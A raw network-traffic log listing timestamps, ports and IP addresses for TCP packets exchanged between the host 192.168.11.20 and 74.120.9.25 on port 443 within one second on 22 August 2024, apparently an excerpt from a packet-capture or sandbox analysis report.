Aug 22, 2024 16:13:38.275717020 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.275892973 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.279447079 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.279807091 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.279807091 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.279836893 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.280015945 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.286730051 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.287111998 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.287132025 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.287276983 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.294152975 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.294570923 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.300564051 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.300793886 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.310354948 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.310540915 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.310714006 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.310736895 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.310935974 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.316123962 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.316339016 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.316339016 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.321604013 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.321789026 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.322007895 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.322031975 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.322309017 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.328891993 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.329176903 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.329201937 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.329343081 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.337378979 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.337593079 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.337615967 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.337912083 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.343965054 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.344302893 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.344302893 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.349112034 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.349380016 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.354419947 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.354598999 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.354716063 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.354729891 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.354918003 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.361480951 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.361613035 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.361752987 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.361753941 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.367494106 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.367710114 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.367990971 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.368014097 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.368237972 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.375952005 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.376120090 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.376281977 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.379828930 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.380047083 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.383209944 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.383397102 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.387634993 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.387954950 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.389482021 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.389705896 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.389705896 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.389734983 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.389911890 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.396791935 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.397073984 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.397073984 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.397103071 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.397327900 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.403563976 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.403755903 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.411808968 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.412004948 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.412004948 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.412030935 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.412044048 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.412195921 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.417711020 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.417965889 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.417965889 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.417994022 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.418260098 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.422949076 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.423202038 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.426726103 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.426947117 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.436781883 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.436997890 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.437017918 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.437212944 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.446727037 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.446974993 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.446999073 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.447139025 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.452343941 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.452564955 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.452565908 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.455496073 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.455666065 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.455831051 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.458983898 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.459219933 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.466029882 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.466253042 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.466276884 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.466594934 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.473745108 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.473931074 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.474143982 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.474155903 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.474340916 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.480278015 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.480458021 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.480483055 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.480668068 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.487262964 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.487494946 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.487495899 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.487495899 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.487495899 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.490657091 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.490833998 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.494344950 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.494554996 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.497695923 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.497889042 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.497889042 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.501272917 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.501444101 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.508605003 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.508841991 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.508860111 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.509109974 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.516179085 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.516343117 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.516343117 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.516508102 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.516518116 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.516688108 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.524045944 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.524250031 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.524250031 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.524271011 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.524477005 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.525856018 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.526011944 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.526177883 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.529509068 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.529720068 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.533102989 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.533274889 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.533301115 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.539884090 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.540050030 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.540050030 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.540066957 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.540263891 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.548209906 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.548553944 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.548569918 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.548718929 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.553960085 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.554133892 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.554133892 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.554152966 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.556983948 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.557145119 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.563544035 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.563683987 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.563731909 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.563731909 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.563746929 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.563946962 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.573209047 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.573383093 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.573383093 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.573400021 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.573628902 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.583071947 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.583235979 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.583333969 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.588723898 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.588891983 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.588891983 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.588911057 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.589104891 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.595298052 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.595477104 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.595477104 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.595498085 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.595508099 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.595693111 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.598762035 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.598957062 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.598957062 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.602246046 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.602416039 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.605688095 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.605921984 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.606086969 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.609901905 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.610136986 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.616270065 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.616437912 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.616487026 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.616487026 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.616492033 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.616652012 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.623528957 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.623665094 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.623713970 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.630419016 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.630672932 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.633805990 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.634027004 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.635793924 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.636015892 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.636243105 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.638660908 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.638901949 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.642227888 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.642437935 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.642437935 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.642445087 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.642652035 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.648446083 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.648586988 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.648678064 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.648682117 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.648844004 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.655966997 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.656286955 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.656286955 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.656295061 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.656552076 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.662137985 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.662302017 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.662450075 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.668404102 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.668593884 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.668600082 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.668831110 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.671601057 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.671758890 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.671925068 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.671925068 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.674777031 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.674937963 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.681226015 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.681550980 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.681556940 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.681762934 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.684465885 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.684637070 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.684637070 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.688258886 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.688498020 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.693715096 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.693906069 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.693911076 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.694119930 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.699841976 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.700002909 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.700002909 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.709670067 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.709793091 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.709793091 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.709841013 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.709845066 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.710006952 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.719813108 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.719971895 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.719971895 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.719979048 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.720201015 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.725054026 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.725249052 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.725255966 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.725464106 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.731482029 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.731806993 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.731806993 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.733810902 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.734050035 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.739948034 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.740307093 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.740307093 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.740315914 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.740518093 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.743001938 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.743160009 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.743258953 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.743258953 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.749294043 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.749455929 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.749504089 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.749507904 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.749670029 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.758009911 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.758178949 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.758178949 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.758186102 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.758394003 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.766751051 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.766875982 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.766927958 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.766932011 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.767092943 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.771972895 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.772376060 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.772376060 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.774812937 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.775053024 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.779956102 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.780122995 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.780201912 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.780208111 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.780366898 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.782990932 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.783126116 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.783174992 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.789206982 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.789444923 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.789452076 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.789660931 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.796646118 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.796854973 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.798335075 CEST	443	49794	74.120.9.25	192.168.11.20
